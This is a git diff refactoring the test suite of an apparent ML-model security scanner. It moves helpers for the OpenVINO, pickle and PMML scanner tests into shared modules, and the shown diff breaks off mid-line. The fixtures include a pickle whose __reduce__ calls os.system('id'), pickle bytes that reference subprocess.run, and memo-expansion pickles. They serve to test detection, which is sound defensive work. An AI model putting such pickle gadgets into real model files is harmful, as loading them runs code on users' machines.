-602,12 +572,7 @@ def test_openvino_scanner_layer_attribute_importlib_false_positive_control(tmp_p """, encoding="utf-8", ) - (tmp_path / "model.bin").write_bytes(b"\x00") - - result = OpenVinoScanner().scan(str(xml_path)) - - assert result.success is True - assert not any(check.name == "Layer Attribute Security Check" for check in result.checks) + _assert_openvino_metadata_control(tmp_path, xml_path, "Layer Attribute Security Check") def test_openvino_scanner_layer_attribute_detects_direct_importlib_reference(tmp_path: Path) -> None: @@ -629,3 +594,30 @@ def test_openvino_scanner_layer_attribute_detects_direct_importlib_reference(tmp assert result.success is False assert any(check.name == "Layer Attribute Security Check" for check in result.checks) + + +def _assert_external_library(tmp_path: Path, xml_path: Path, message: str) -> None: + (tmp_path / "model.bin").write_bytes(b"\x00") + + result = OpenVinoScanner().scan(str(xml_path)) + + assert result.success is False + assert any(message in issue.message for issue in result.issues) + + +def _assert_openvino_metadata_control(tmp_path: Path, xml_path: Path, check_name: str) -> None: + (tmp_path / "model.bin").write_bytes(b"\x00") + + result = OpenVinoScanner().scan(str(xml_path)) + + assert result.success is True + assert not any(check.name == check_name for check in result.checks) + + +def _assert_namespaced_layer(tmp_path: Path, xml_path: Path, weights_filename: str) -> None: + (tmp_path / weights_filename).write_bytes(b"\x00") + + result = OpenVinoScanner().scan(str(xml_path)) + + assert any(check.name == "Suspicious Layer Type Detection" for check in result.checks) + assert any(check.name == "External Library Reference Check" for check in result.checks) diff --git a/tests/scanners/test_paddle_scanner.py b/tests/scanners/test_paddle_scanner.py index 7f65228ae..d0873bba6 100644 --- a/tests/scanners/test_paddle_scanner.py +++ b/tests/scanners/test_paddle_scanner.py @@ -10,11 +10,7 @@ from modelaudit.scanners.base import INCONCLUSIVE_SCAN_OUTCOME, CheckStatus, IssueSeverity from modelaudit.scanners.paddle_scanner import PaddleScanner from modelaudit.utils.file.detection import validate_file_type - - -def _write_chunk_boundary_payload(path: Path, pattern: bytes, *, prefix_len: int, suffix: bytes = b"") -> None: - chunk_size = 1024 * 1024 - path.write_bytes(b"\x00" * (chunk_size - prefix_len) + pattern[:prefix_len] + pattern[prefix_len:] + suffix) +from tests.helpers.file_creators import write_chunk_boundary_payload as _write_chunk_boundary_payload def test_paddle_scanner_can_handle(tmp_path: Path) -> None: diff --git a/tests/scanners/test_pickle_scanner.py b/tests/scanners/test_pickle_scanner.py index 64a3e9bba..6b35ac82b 100644 --- a/tests/scanners/test_pickle_scanner.py +++ b/tests/scanners/test_pickle_scanner.py @@ -19,7 +19,6 @@ from modelaudit.core import determine_exit_code, scan_model_directory_or_file from modelaudit.core_results import merge_scan_result from modelaudit.models import create_initial_audit_result -from modelaudit.scanner_results import ACTIONABLE_FAILED_CHECKS_METADATA_KEY from modelaudit.scanners import pickle_scanner from modelaudit.scanners.base import INCONCLUSIVE_SCAN_OUTCOME, CheckStatus, IssueSeverity, ScanResult from modelaudit.scanners.joblib_scanner import JoblibScanner @@ -43,6 +42,18 @@ is_suspicious_global, ) from tests.helpers import create_mock_pytorch_zip +from tests.helpers.cache import private_actionable_failed_checks as _private_actionable_failed_checks +from tests.helpers.file_creators import ReadTrackingBuffer, SystemCommandPayload +from tests.helpers.file_creators import ( + joblib_numpy_raw_segment as _joblib_test_numpy_raw_segment, +) +from tests.helpers.file_creators import pickle_binunicode as _binunicode +from tests.helpers.file_creators import pickle_short_binunicode as _short_binunicode +from tests.helpers.pickle_framework import ( + _make_dup_heavy_pickle, + _make_memo_expansion_pickle, + _make_pre_memoized_post_budget_stack_global_payload, +) EXPECTED_SYSTEM_GLOBAL = "nt.system" if os.name == "nt" else "posix.system" BYPASS_V4_REFERENCES_TEST_CASES: tuple[tuple[str, str, IssueSeverity], ...] = ( @@ -59,26 +70,16 @@ ) -class MaliciousPayload: - def __reduce__(self) -> tuple[Any, tuple[str]]: - return (os.system, ("id",)) - - class NonSeekableBytesIO(io.BytesIO): def seekable(self) -> bool: return False -class CountingNonSeekableBytesIO(NonSeekableBytesIO): +class CountingNonSeekableBytesIO(NonSeekableBytesIO, ReadTrackingBuffer): def __init__(self, initial_bytes: bytes) -> None: super().__init__(initial_bytes) self.bytes_read = 0 - def read(self, size: int | None = -1) -> bytes: - data = super().read(size) - self.bytes_read += len(data) - return data - class BrokenTellStream(io.BytesIO): def seekable(self) -> bool: @@ -143,16 +144,6 @@ def read(self, size: int | None = -1) -> bytes: raise OSError("native read failed") -def _short_binunicode(data: bytes) -> bytes: - if len(data) > 0xFF: - raise ValueError("SHORT_BINUNICODE helper accepts at most 255 bytes") - return b"\x8c" + bytes([len(data)]) + data - - -def _binunicode(data: bytes) -> bytes: - return b"X" + len(data).to_bytes(4, "little") + data - - def _joblib_test_binunicode(value: str) -> bytes: return _binunicode(value.encode("utf-8")) @@ -179,11 +170,6 @@ def _joblib_test_numpy_wrapper_control(*, shape: int = 4, dtype: str = "i8") -> ) -def _joblib_test_numpy_raw_segment(prefix_length: int, raw_data: bytes) -> bytes: - padding_length = 16 - ((prefix_length + 1) % 16) - return bytes([padding_length]) + (b"\xff" * padding_length) + raw_data - - def _joblib_test_numpy_array_payload() -> bytes: prefix = b"\x80\x02](" + _joblib_test_numpy_wrapper_control() return prefix + _joblib_test_numpy_raw_segment(len(prefix), b"\x00" * 32) + b"e." @@ -270,44 +256,6 @@ def _make_opcode_padding_stream(opcode_pairs: int) -> bytes: return b"\x80\x02" + (b"K\x010" * opcode_pairs) + b"." -def _make_pre_memoized_post_budget_stack_global_payload(tail: bytes) -> bytes: - payload = bytearray(b"\x80\x04") - payload += _short_binunicode(b"subprocess") + b"\x94" - payload += _short_binunicode(b"run") + b"\x94" - payload += b"\x880" * 4 - payload += tail - return bytes(payload) - - -def _make_memo_expansion_pickle(iterations: int, *, inert_writes: int = 0) -> bytes: - total_writes = iterations + inert_writes - if not 1 <= iterations <= 255 or total_writes > 255: - raise ValueError("iterations + inert_writes must fit in BINPUT/BINGET opcodes") - - payload = bytearray(b"\x80\x02)q\x000") - for memo_index in range(1, iterations + 1): - previous_index = memo_index - 1 - payload += b"h" + bytes([previous_index]) - payload += b"h" + bytes([previous_index]) - payload += b"\x86" - payload += b"q" + bytes([memo_index]) - payload += b"0" - for memo_index in range(iterations + 1, total_writes + 1): - payload += b"K\x01" - payload += b"q" + bytes([memo_index]) - payload += b"0" - payload += b"h" + bytes([iterations]) + b"." - return bytes(payload) - - -def _make_dup_heavy_pickle(iterations: int) -> bytes: - payload = bytearray(b"\x80\x02]q\x00") - for _ in range(iterations): - payload += b"h\x002a0" - payload += b"." - return bytes(payload) - - def _legacy_pytorch_object_stream( storage_keys: tuple[str, ...], storage_size: int, @@ -323,7 +271,7 @@ def _legacy_pytorch_object_stream( object_stream += pickle.dumps(storage_size, protocol=2)[2:-1] object_stream += b"NtQa" if malicious_object: - malicious_pickle = pickle.dumps(MaliciousPayload(), protocol=2) + malicious_pickle = pickle.dumps(SystemCommandPayload("id", lambda: os.system), protocol=2) object_stream += malicious_pickle[2:-1] + b"a" object_stream += b"." return bytes(object_stream) @@ -449,16 +397,6 @@ def _trusted_legacy_storage_pid_checks(result: ScanResult) -> list[Any]: ] -def _private_actionable_failed_checks(scan_result: dict[str, Any]) -> list[dict[str, Any]]: - private_metadata = scan_result.get("_private_metadata") - if not isinstance(private_metadata, dict): - return [] - actionable_failed_checks = private_metadata.get(ACTIONABLE_FAILED_CHECKS_METADATA_KEY) - if not isinstance(actionable_failed_checks, list): - return [] - return [entry for entry in actionable_failed_checks if isinstance(entry, dict)] - - def _assert_critical_explicit_url( result: ScanResult, matched_text: str, @@ -999,7 +937,7 @@ def test_expensive_raw_prefilters_preserve_serialized_cc_terms(tmp_path: Path, t def test_scan_malicious_pickle_reports_rust_finding(tmp_path: Path) -> None: path = tmp_path / "evil.pkl" - path.write_bytes(pickle.dumps(MaliciousPayload(), protocol=4)) + path.write_bytes(pickle.dumps(SystemCommandPayload("id", lambda: os.system), protocol=4)) result = PickleScanner().scan(str(path)) @@ -2548,19 +2486,7 @@ def test_post_budget_scan_detects_prememoized_stack_global_tail(tmp_path: Path) ids=["memo-module-inline-name", "inline-module-memo-name"], ) def test_post_budget_scan_detects_mixed_prememoized_stack_global_tail(tmp_path: Path, tail: bytes) -> None: - path = tmp_path / "post-budget-prememo-mixed-stack-global.pkl" - path.write_bytes(_make_pre_memoized_post_budget_stack_global_payload(tail)) - - result = PickleScanner({"max_opcodes": 7, "post_budget_global_scan_limit_bytes": 4096}).scan(str(path)) - - assert any( - issue.severity == IssueSeverity.CRITICAL - and issue.details.get("pickle_rule_code") == "POST_BUDGET_GLOBAL" - and issue.details.get("module") == "subprocess" - and issue.details.get("name") == "run" - for issue in result.issues - ), result.issues - assert result.success is False + _assert_post_budget_stack_global_tail(tmp_path, tail, ("post-budget-prememo-mixed-stack-global.pkl")) @pytest.mark.parametrize( @@ -2576,19 +2502,7 @@ def test_post_budget_scan_detects_interleaved_prememoized_stack_global_tail( tmp_path: Path, tail: bytes, ) -> None: - path = tmp_path / "post-budget-prememo-interleaved-stack-global.pkl" - path.write_bytes(_make_pre_memoized_post_budget_stack_global_payload(tail)) - - result = PickleScanner({"max_opcodes": 7, "post_budget_global_scan_limit_bytes": 4096}).scan(str(path)) - - assert any( - issue.severity == IssueSeverity.CRITICAL - and issue.details.get("pickle_rule_code") == "POST_BUDGET_GLOBAL" - and issue.details.get("module") == "subprocess" - and issue.details.get("name") == "run" - for issue in result.issues - ), result.issues - assert result.success is False + _assert_post_budget_stack_global_tail(tmp_path, tail, ("post-budget-prememo-interleaved-stack-global.pkl")) @pytest.mark.parametrize( @@ -2878,7 +2792,7 @@ def test_scan_stream_fails_closed_when_supplemental_raw_analysis_cannot_read() - def test_scan_stream_marks_supplemental_read_failure_operational_with_security_finding() -> None: - payload = pickle.dumps(MaliciousPayload(), protocol=4) + payload = pickle.dumps(SystemCommandPayload("id", lambda: os.system), protocol=4) result = PickleScanner().scan_stream( BrokenSupplementalReadStream(payload), @@ -4920,7 +4834,7 @@ def test_non_seekable_legacy_pytorch_stream_omits_only_raw_storage() -> None: def test_non_seekable_legacy_pytorch_stream_keeps_unread_suffix_inconclusive() -> None: payload, _pickle_end = _make_legacy_pytorch_container(b"A" * 512) storage_end = len(payload) - appended_pickle = pickle.dumps(MaliciousPayload(), protocol=4) + appended_pickle = pickle.dumps(SystemCommandPayload("id", lambda: os.system), protocol=4) combined_payload = payload + appended_pickle result = PickleScanner(config={"max_known_stream_read_bytes": 256}).scan_stream( @@ -5026,7 +4940,7 @@ def test_seekable_legacy_pytorch_stream_scans_suffix_beyond_storage_window() -> prefix = b"WRAPPED:" payload, pickle_end = _make_legacy_pytorch_container(b"A" * 4096) storage_end = len(payload) - appended_pickle = pickle.dumps(MaliciousPayload(), protocol=4) + appended_pickle = pickle.dumps(SystemCommandPayload("id", lambda: os.system), protocol=4) global_position = next( position for opcode, _arg, position in pickletools.genops(appended_pickle) @@ -5094,7 +5008,7 @@ def test_legacy_pytorch_storage_bytes_do_not_trigger_pickle_cve_patterns(tmp_pat def test_legacy_pytorch_container_scans_pickle_after_large_storage(tmp_path: Path) -> None: payload, pickle_end = _make_legacy_pytorch_container(b"A" * 4096) storage_end = len(payload) - appended_pickle = pickle.dumps(MaliciousPayload(), protocol=4) + appended_pickle = pickle.dumps(SystemCommandPayload("id", lambda: os.system), protocol=4) global_position = next( position for opcode, _arg, position in pickletools.genops(appended_pickle) @@ -5751,7 +5665,7 @@ def test_legitimate_serialization_file_rejects_bare_joblib_wrapper_without_span_ bare_path = tmp_path / "bare.joblib" bare_path.write_bytes(b"\x80\x04cjoblib.numpy_pickle\nNumpyArrayWrapper\nq\x00not-joblib-raw-tail") malicious_path = tmp_path / "evil.joblib" - malicious_path.write_bytes(pickle.dumps(MaliciousPayload(), protocol=4)) + malicious_path.write_bytes(pickle.dumps(SystemCommandPayload("id", lambda: os.system), protocol=4)) text_path = tmp_path / "not-pickle.joblib" text_path.write_text("not a pickle", encoding="utf-8") monkeypatch.setattr( @@ -5860,3 +5774,19 @@ def test_scan_missing_path_fails_closed(tmp_path: Path) -> None: assert result.success is False assert any(check.name == "Path Exists" for check in result.checks) + + +def _assert_post_budget_stack_global_tail(tmp_path: Path, tail: bytes, filename: str) -> None: + path = tmp_path / filename + path.write_bytes(_make_pre_memoized_post_budget_stack_global_payload(tail)) + + result = PickleScanner({"max_opcodes": 7, "post_budget_global_scan_limit_bytes": 4096}).scan(str(path)) + + assert any( + issue.severity == IssueSeverity.CRITICAL + and issue.details.get("pickle_rule_code") == "POST_BUDGET_GLOBAL" + and issue.details.get("module") == "subprocess" + and issue.details.get("name") == "run" + for issue in result.issues + ), result.issues + assert result.success is False diff --git a/tests/scanners/test_picklescan_adapter.py b/tests/scanners/test_picklescan_adapter.py index 8bb70c50d..da98270c6 100644 --- a/tests/scanners/test_picklescan_adapter.py +++ b/tests/scanners/test_picklescan_adapter.py @@ -971,22 +971,9 @@ def test_pickle_report_to_scan_result_fails_closed_for_truncated_literal_scan_no ), ) - result = pickle_report_to_scan_result(report) - - assert result.success is False - assert result.metadata["scan_outcome"] == INCONCLUSIVE_SCAN_OUTCOME - assert result.metadata["scan_outcome_reasons"] == ["literal_scan_truncated"] - assert result.metadata["analysis_incomplete"] is True - notice_check = next( - check - for check in result.checks - if check.name == "Standalone Pickle Notice" - and check.status.value == "failed" - and check.severity == IssueSeverity.INFO - and check.rule_code == "S902" - and check.details["pickle_notice_code"] == "literal_scan_truncated" + _assert_incomplete_notice_check( + report, False, "literal_scan_truncated", "String literal scan truncated at configured limit" ) - assert notice_check.message == "String literal scan truncated at configured limit" def test_pickle_report_to_scan_result_fails_closed_for_truncated_import_references() -> None: @@ -1041,13 +1028,7 @@ def test_pickle_report_to_scan_result_fails_closed_for_legacy_complete_truncated ), ) - result = pickle_report_to_scan_result(report) - - assert result.success is False - assert result.metadata["scan_outcome"] == INCONCLUSIVE_SCAN_OUTCOME - assert result.metadata["scan_outcome_reasons"] == ["import_references_truncated"] - assert result.metadata["analysis_incomplete"] is True - assert should_cache_scan_result(result.to_dict()) is False + _assert_incomplete_report_not_cached(report, "import_references_truncated") def test_pickle_report_to_scan_result_keeps_legacy_truncated_findings_successful() -> None: @@ -1144,13 +1125,7 @@ def test_pickle_report_to_scan_result_fails_closed_for_legacy_complete_truncated ), ) - result = pickle_report_to_scan_result(report) - - assert result.success is False - assert result.metadata["scan_outcome"] == INCONCLUSIVE_SCAN_OUTCOME - assert result.metadata["scan_outcome_reasons"] == ["callable_invocations_truncated"] - assert result.metadata["analysis_incomplete"] is True - assert should_cache_scan_result(result.to_dict()) is False + _assert_incomplete_report_not_cached(report, "callable_invocations_truncated") def test_pickle_report_to_scan_result_fails_closed_for_encoded_nested_truncation_notice() -> None: @@ -1178,22 +1153,12 @@ def test_pickle_report_to_scan_result_fails_closed_for_encoded_nested_truncation ), ) - result = pickle_report_to_scan_result(report) - - assert result.success is True - assert result.metadata["scan_outcome"] == INCONCLUSIVE_SCAN_OUTCOME - assert result.metadata["scan_outcome_reasons"] == ["encoded_nested_payload_truncated"] - assert result.metadata["analysis_incomplete"] is True - notice_check = next( - check - for check in result.checks - if check.name == "Standalone Pickle Notice" - and check.status.value == "failed" - and check.severity == IssueSeverity.INFO - and check.rule_code == "S902" - and check.details["pickle_notice_code"] == "encoded_nested_payload_truncated" + _assert_incomplete_notice_check( + report, + True, + "encoded_nested_payload_truncated", + "Encoded pickle payload exceeds configured deep-scan byte limit", ) - assert notice_check.message == "Encoded pickle payload exceeds configured deep-scan byte limit" def test_pickle_report_to_scan_result_preserves_critical_s601_for_encoded_nested_payload_missing_encoding() -> None: @@ -1269,22 +1234,9 @@ def test_pickle_report_to_scan_result_fails_closed_for_raw_nested_truncation_not ), ) - result = pickle_report_to_scan_result(report) - - assert result.success is True - assert result.metadata["scan_outcome"] == INCONCLUSIVE_SCAN_OUTCOME - assert result.metadata["scan_outcome_reasons"] == ["nested_payload_truncated"] - assert result.metadata["analysis_incomplete"] is True - notice_check = next( - check - for check in result.checks - if check.name == "Standalone Pickle Notice" - and check.status.value == "failed" - and check.severity == IssueSeverity.INFO - and check.rule_code == "S902" - and check.details["pickle_notice_code"] == "nested_payload_truncated" + _assert_incomplete_notice_check( + report, True, "nested_payload_truncated", "Nested pickle payload exceeds configured deep-scan byte limit" ) - assert notice_check.message == "Nested pickle payload exceeds configured deep-scan byte limit" def test_pickle_report_to_scan_result_fails_closed_for_nested_probe_limit_notice() -> None: @@ -1352,22 +1304,9 @@ def test_pickle_report_to_scan_result_fails_closed_for_nested_incomplete_notice( ), ) - result = pickle_report_to_scan_result(report) - - assert result.success is False - assert result.metadata["scan_outcome"] == INCONCLUSIVE_SCAN_OUTCOME - assert result.metadata["scan_outcome_reasons"] == ["nested_pickle_incomplete"] - assert result.metadata["analysis_incomplete"] is True - notice_check = next( - check - for check in result.checks - if check.name == "Standalone Pickle Notice" - and check.status.value == "failed" - and check.severity == IssueSeverity.INFO - and check.rule_code == "S902" - and check.details["pickle_notice_code"] == "nested_pickle_incomplete" + _assert_incomplete_notice_check( + report, False, "nested_pickle_incomplete", "Nested pickle analysis did not complete" ) - assert notice_check.message == "Nested pickle analysis did not complete" @pytest.mark.parametrize( @@ -1500,16 +1439,8 @@ def test_pickle_report_to_scan_result_keeps_trusted_bin_padding_tails_as_inconcl metadata={"first_pickle_end_pos": 56, "import_references": _benign_tail_import_references()}, ) - result = pickle_report_to_scan_result(report) - - assert result.success is False - assert result.metadata["scan_outcome"] == INCONCLUSIVE_SCAN_OUTCOME - assert not any(issue.message == "Pickle parsing failed before full scan completion" for issue in result.issues) - assert any( - issue.severity == IssueSeverity.INFO - and issue.rule_code == "S902" - and issue.message == "Pickle parsing stopped before the stream was fully consumed: ValueError" - for issue in result.issues + _assert_inconclusive_padding_notice( + report, "Pickle parsing stopped before the stream was fully consumed: ValueError" ) @@ -1534,16 +1465,8 @@ def test_pickle_report_to_scan_result_keeps_unicode_decode_tails_as_inconclusive metadata={"first_pickle_end_pos": 20, "import_references": _benign_tail_import_references()}, ) - result = pickle_report_to_scan_result(report) - - assert result.success is False - assert result.metadata["scan_outcome"] == INCONCLUSIVE_SCAN_OUTCOME - assert not any(issue.message == "Pickle parsing failed before full scan completion" for issue in result.issues) - assert any( - issue.severity == IssueSeverity.INFO - and issue.rule_code == "S902" - and issue.message == "Pickle parsing stopped before the stream was fully consumed: UnicodeDecodeError" - for issue in result.issues + _assert_inconclusive_padding_notice( + report, "Pickle parsing stopped before the stream was fully consumed: UnicodeDecodeError" ) @@ -1568,16 +1491,8 @@ def test_pickle_report_to_scan_result_keeps_zero_padding_tails_as_inconclusive_n metadata={"first_pickle_end_pos": 19, "import_references": _benign_tail_import_references()}, ) - result = pickle_report_to_scan_result(report) - - assert result.success is False - assert result.metadata["scan_outcome"] == INCONCLUSIVE_SCAN_OUTCOME - assert not any(issue.message == "Pickle parsing failed before full scan completion" for issue in result.issues) - assert any( - issue.severity == IssueSeverity.INFO - and issue.rule_code == "S902" - and issue.message == "Pickle parsing stopped before the stream was fully consumed: ValueError" - for issue in result.issues + _assert_inconclusive_padding_notice( + report, "Pickle parsing stopped before the stream was fully consumed: ValueError" ) @@ -1803,16 +1718,8 @@ def test_pickle_report_to_scan_result_keeps_joblib_unknown_opcode_tails_as_incon }, ) - result = pickle_report_to_scan_result(report) - - assert result.success is False - assert result.metadata["scan_outcome"] == INCONCLUSIVE_SCAN_OUTCOME - assert not any(issue.message == "Pickle parsing failed before full scan completion" for issue in result.issues) - assert any( - issue.severity == IssueSeverity.INFO - and issue.rule_code == "S902" - and issue.message == "Pickle parsing stopped before the stream was fully consumed: ValueError" - for issue in result.issues + _assert_inconclusive_padding_notice( + report, "Pickle parsing stopped before the stream was fully consumed: ValueError" ) @@ -2184,3 +2091,41 @@ def test_pinned_bge_small_zh_hf_scan_completes_without_private_metadata_error(tm assert "pytorch_model/data.pkl" in serialized_report assert "pytorch_zip_scan_incomplete" not in serialized_report assert "analysis_incomplete" not in serialized_report + + +def _assert_inconclusive_padding_notice(report: PickleReport, message: str) -> None: + result = pickle_report_to_scan_result(report) + assert result.success is False + assert result.metadata["scan_outcome"] == INCONCLUSIVE_SCAN_OUTCOME + assert not any(issue.message == "Pickle parsing failed before full scan completion" for issue in result.issues) + assert any( + issue.severity == IssueSeverity.INFO and issue.rule_code == "S902" and (issue.message == message) + for issue in result.issues + ) + + +def _assert_incomplete_notice_check(report: PickleReport, expected_success: bool, reason: str, message: str) -> None: + result = pickle_report_to_scan_result(report) + assert result.success is expected_success + assert result.metadata["scan_outcome"] == INCONCLUSIVE_SCAN_OUTCOME + assert result.metadata["scan_outcome_reasons"] == [reason] + assert result.metadata["analysis_incomplete"] is True + notice_check = next( + check + for check in result.checks + if check.name == "Standalone Pickle Notice" + and check.status.value == "failed" + and (check.severity == IssueSeverity.INFO) + and (check.rule_code == "S902") + and (check.details["pickle_notice_code"] == reason) + ) + assert notice_check.message == message + + +def _assert_incomplete_report_not_cached(report: PickleReport, reason: str) -> None: + result = pickle_report_to_scan_result(report) + assert result.success is False + assert result.metadata["scan_outcome"] == INCONCLUSIVE_SCAN_OUTCOME + assert result.metadata["scan_outcome_reasons"] == [reason] + assert result.metadata["analysis_incomplete"] is True + assert should_cache_scan_result(result.to_dict()) is False diff --git a/tests/scanners/test_pmml_scanner.py b/tests/scanners/test_pmml_scanner.py index 7e6332192..3b3584996 100644 --- a/tests/scanners/test_pmml_scanner.py +++ b/tests/scanners/test_pmml_scanner.py @@ -1,51 +1,15 @@ from pathlib import Path -from typing import Any from unittest.mock import patch import pytest -from modelaudit.cache import get_cache_manager, reset_cache_manager +from modelaudit.cache import reset_cache_manager from modelaudit.core import determine_exit_code, scan_model_directory_or_file from modelaudit.scanner_results import INCONCLUSIVE_SCAN_OUTCOME from modelaudit.scanners import pmml_scanner as pmml_scanner_module -from modelaudit.scanners.base import CheckStatus, IssueSeverity +from modelaudit.scanners.base import CheckStatus, Issue, IssueSeverity, ScanResult from modelaudit.scanners.pmml_scanner import PmmlScanner - - -def _assert_inconclusive_aggregate_not_cached( - path: Path, - expected_reason: str, - cache_dir: Path, - **scan_kwargs: Any, -) -> None: - reset_cache_manager() - try: - first = scan_model_directory_or_file( - str(path), - cache_enabled=True, - cache_dir=str(cache_dir), - min_cache_file_size=0, - **scan_kwargs, - ) - second = scan_model_directory_or_file( - str(path), - cache_enabled=True, - cache_dir=str(cache_dir), - min_cache_file_size=0, - **scan_kwargs, - ) - - for aggregate in (first, second): - metadata = aggregate.file_metadata[str(path)] - assert metadata["scan_outcome"] == INCONCLUSIVE_SCAN_OUTCOME - assert expected_reason in metadata["scan_outcome_reasons"] - assert not [ - issue for issue in aggregate.issues if issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} - ] - assert determine_exit_code(aggregate) == 2 - assert get_cache_manager(str(cache_dir), enabled=True).get_stats()["total_entries"] == 0 - finally: - reset_cache_manager() +from tests.helpers.cache import assert_inconclusive_not_cached as _assert_inconclusive_aggregate_not_cached def test_pmml_scanner_basic(tmp_path: Path) -> None: @@ -76,9 +40,7 @@ def test_pmml_scanner_xxe(tmp_path: Path) -> None: """ path = tmp_path / "evil.pmml" - path.write_text(pmml, encoding="utf-8") - - result = PmmlScanner().scan(str(path)) + result = _scan_pmml_fixture(path, pmml) messages = [i.message.lower() for i in result.issues] assert result.success is False assert any("doctype" in m or "entity" in m for m in messages) @@ -197,9 +159,7 @@ def test_pmml_scanner_suspicious_extension_content(tmp_path: Path) -> None: """ path = tmp_path / "suspicious.pmml" - path.write_text(pmml, encoding="utf-8") - - result = PmmlScanner().scan(str(path)) + result = _scan_pmml_fixture(path, pmml) assert result.success # Should detect suspicious patterns @@ -221,9 +181,7 @@ def test_pmml_scanner_benign_ecosystem_call_is_not_flagged(tmp_path: Path) -> No """ path = tmp_path / "ecosystem.pmml" - path.write_text(pmml, encoding="utf-8") - - result = PmmlScanner().scan(str(path)) + result = _scan_pmml_fixture(path, pmml) assert result.success is True assert not any(issue.details.get("pattern") == r"\bsystem\s*\(" for issue in result.issues) @@ -238,9 +196,7 @@ def test_pmml_scanner_system_call_is_flagged(tmp_path: Path) -> None: """ path = tmp_path / "system_call.pmml" - path.write_text(pmml, encoding="utf-8") - - result = PmmlScanner().scan(str(path)) + result = _scan_pmml_fixture(path, pmml) assert result.success is True assert any(issue.details.get("pattern") == r"\bsystem\s*\(" for issue in result.issues) @@ -255,9 +211,7 @@ def test_pmml_scanner_mixed_case_system_call_is_flagged(tmp_path: Path) -> None: """ path = tmp_path / "mixed_case_system_call.pmml" - path.write_text(pmml, encoding="utf-8") - - result = PmmlScanner().scan(str(path)) + result = _scan_pmml_fixture(path, pmml) assert result.success is True assert any(issue.details.get("pattern") == r"\bsystem\s*\(" for issue in result.issues) @@ -274,9 +228,7 @@ def test_pmml_scanner_namespaced_extension_content(tmp_path: Path) -> None: """ path = tmp_path / "namespaced_suspicious.pmml" - path.write_text(pmml, encoding="utf-8") - - result = PmmlScanner().scan(str(path)) + result = _scan_pmml_fixture(path, pmml) assert result.success is True assert any("Suspicious XML element found" in issue.message for issue in result.issues) @@ -292,9 +244,7 @@ def test_pmml_scanner_benign_subprocess_prose_is_not_flagged(tmp_path: Path) -> """ path = tmp_path / "subprocess_metrics.pmml" - path.write_text(pmml, encoding="utf-8") - - result = PmmlScanner().scan(str(path)) + result = _scan_pmml_fixture(path, pmml) assert result.success is True assert not any( @@ -320,9 +270,7 @@ def test_pmml_scanner_code_shaped_subprocess_extension_is_flagged(tmp_path: Path """ path = tmp_path / "subprocess_code.pmml" - path.write_text(pmml, encoding="utf-8") - - result = PmmlScanner().scan(str(path)) + result = _scan_pmml_fixture(path, pmml) assert result.success is True assert any( @@ -348,9 +296,7 @@ def test_pmml_scanner_subprocess_getoutput_call_is_flagged_without_import( """ path = tmp_path / "subprocess_getoutput.pmml" - path.write_text(pmml, encoding="utf-8") - - result = PmmlScanner().scan(str(path)) + result = _scan_pmml_fixture(path, pmml) assert result.success is True assert any( @@ -370,9 +316,7 @@ def test_pmml_scanner_importlib_subprocess_call_is_flagged(tmp_path: Path) -> No """ path = tmp_path / "importlib_subprocess.pmml" - path.write_text(pmml, encoding="utf-8") - - result = PmmlScanner().scan(str(path)) + result = _scan_pmml_fixture(path, pmml) assert result.success is True assert any( @@ -396,9 +340,7 @@ def test_pmml_scanner_external_references(tmp_path: Path) -> None: """ path = tmp_path / "external_refs.pmml" - path.write_text(pmml, encoding="utf-8") - - result = PmmlScanner().scan(str(path)) + result = _scan_pmml_fixture(path, pmml) assert result.success # Should detect external references @@ -418,9 +360,7 @@ def test_pmml_scanner_documentation_urls_are_not_external_resources(tmp_path: Pa """ path = tmp_path / "documented.pmml" - path.write_text(pmml, encoding="utf-8") - - result = PmmlScanner().scan(str(path)) + result = _scan_pmml_fixture(path, pmml) assert result.success is True assert not any(check.name == "External Resource Reference Check" for check in result.checks) @@ -440,9 +380,7 @@ def test_pmml_scanner_standard_namespaced_documentation_urls_are_not_external_re """ path = tmp_path / "namespaced_documented.pmml" - path.write_text(pmml, encoding="utf-8") - - result = PmmlScanner().scan(str(path)) + result = _scan_pmml_fixture(path, pmml) assert result.success is True assert not any(check.name == "External Resource Reference Check" for check in result.checks) @@ -461,9 +399,7 @@ def test_pmml_scanner_mixed_case_documentation_attrs_are_not_external_resources( """ path = tmp_path / "mixed_case_documentation_attrs.pmml" - path.write_text(pmml, encoding="utf-8") - - result = PmmlScanner().scan(str(path)) + result = _scan_pmml_fixture(path, pmml) assert result.success is True assert not any(check.name == "External Resource Reference Check" for check in result.checks) @@ -480,13 +416,9 @@ def test_pmml_scanner_unrecognized_root_namespace_documentation_urls_warn(tmp_pa """ path = tmp_path / "unrecognized_namespace_documented.pmml" - path.write_text(pmml, encoding="utf-8") - - result = PmmlScanner().scan(str(path)) + result = _scan_pmml_fixture(path, pmml) - external_issues = [issue for issue in result.issues if "external resource" in issue.message.lower()] - assert external_issues - assert all(issue.severity == IssueSeverity.WARNING for issue in external_issues) + external_issues = _external_resource_issues(result) def test_pmml_scanner_unrecognized_root_namespace_documentation_attributes_warn(tmp_path: Path) -> None: @@ -497,13 +429,9 @@ def test_pmml_scanner_unrecognized_root_namespace_documentation_attributes_warn( """ path = tmp_path / "unrecognized_namespace_documentation_attribute.pmml" - path.write_text(pmml, encoding="utf-8") + result = _scan_pmml_fixture(path, pmml) - result = PmmlScanner().scan(str(path)) - - external_issues = [issue for issue in result.issues if "external resource" in issue.message.lower()] - assert external_issues - assert all(issue.severity == IssueSeverity.WARNING for issue in external_issues) + external_issues = _external_resource_issues(result) assert any(str(issue.details.get("attribute", "")).endswith("description") for issue in external_issues) @@ -517,13 +445,9 @@ def test_pmml_scanner_non_pmml_root_documentation_urls_warn(tmp_path: Path) -> N """ path = tmp_path / "non_pmml_root_documentation.pmml" - path.write_text(pmml, encoding="utf-8") + result = _scan_pmml_fixture(path, pmml) - result = PmmlScanner().scan(str(path)) - - external_issues = [issue for issue in result.issues if "external resource" in issue.message.lower()] - assert external_issues - assert all(issue.severity == IssueSeverity.WARNING for issue in external_issues) + external_issues = _external_resource_issues(result) assert any(issue.details.get("context") == "text" for issue in external_issues) assert any(str(issue.details.get("attribute", "")).endswith("description") for issue in external_issues) assert any(str(issue.details.get("attribute", "")).endswith("reference") for issue in external_issues) @@ -539,13 +463,9 @@ def test_pmml_scanner_namespaced_application_reference_still_warns(tmp_path: Pat """ path = tmp_path / "namespaced_application_reference.pmml" - path.write_text(pmml, encoding="utf-8") + result = _scan_pmml_fixture(path, pmml) - result = PmmlScanner().scan(str(path)) - - external_issues = [issue for issue in result.issues if "external resource" in issue.message.lower()] - assert external_issues - assert 